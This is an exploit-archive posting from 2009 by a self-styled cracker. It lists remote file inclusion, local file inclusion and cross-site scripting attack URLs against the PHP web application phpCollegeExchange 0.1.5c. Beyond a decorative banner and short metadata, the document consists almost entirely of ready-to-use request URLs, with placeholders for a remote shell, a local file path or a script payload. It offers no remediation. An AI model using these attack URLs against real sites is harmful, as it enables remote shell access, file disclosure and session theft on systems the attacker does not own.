phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities

2009-06-23T00:00:00
ID 1337DAY-ID-5404
Type zdt
Reporter CraCkEr
Modified 2009-06-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities
================================================================


-----------------------------------------------------------------------------------¬
¦¦                                C r a C k E r                                   --
--             T H E   C R A C K   O F   E T E R N A L   M I G H T                ¦¦
L-----------------------------------------------------------------------------------

 -----         From The Ashes and Dust Rises An Unimaginable crack....         ----¬
-----------------------------------------------------------------------------------¬
--         [ Remote File Include ]     [ Local File Include ]     [ XSS ]         --
L-----------------------------------------------------------------------------------
:   Author   : CraCkEr                   : :                                       :
¦   Script   : phpCollegeExchange 0.1.5c ¦ ¦          Register Globals :           ¦
¦   Download : sourceforge.net           ¦ ¦                                       ¦
¦   Method   : GET                       ¦ ¦           [-] ON   [ ] OFF            ¦
¦   Critical : High [--------]           ¦ ¦                                       ¦
¦   Impact   : system information        ¦ ¦                                       ¦
¦ ---------------------------------------- L-------------------------------------- ¦
¦                                                                                 --
L-----------------------------------------------------------------------------------
:                                                                                  :
¦  Release Notes:                                                                  ¦
¦  =============                                                                   ¦
¦  Typically used for remotely exploitable vulnerabilities that can lead to        ¦
¦  system compromise.                                                              ¦
¦                                                                                  ¦

-----------------------------------------------------------------------------------¬
--                                Exploit URL's                                   --
L-----------------------------------------------------------------------------------

[RFI]

http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]


[LFI]

http://localhost/path/house/myrents.php?home=[LFI]


[XSS]

http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]


   
L-----------------------------------------------------------------------------------


-----------------------------------------------------------------------------------¬
--                                 © CraCkEr 2009                                 --
L-----------------------------------------------------------------------------------




#  0day.today [2018-03-09]  #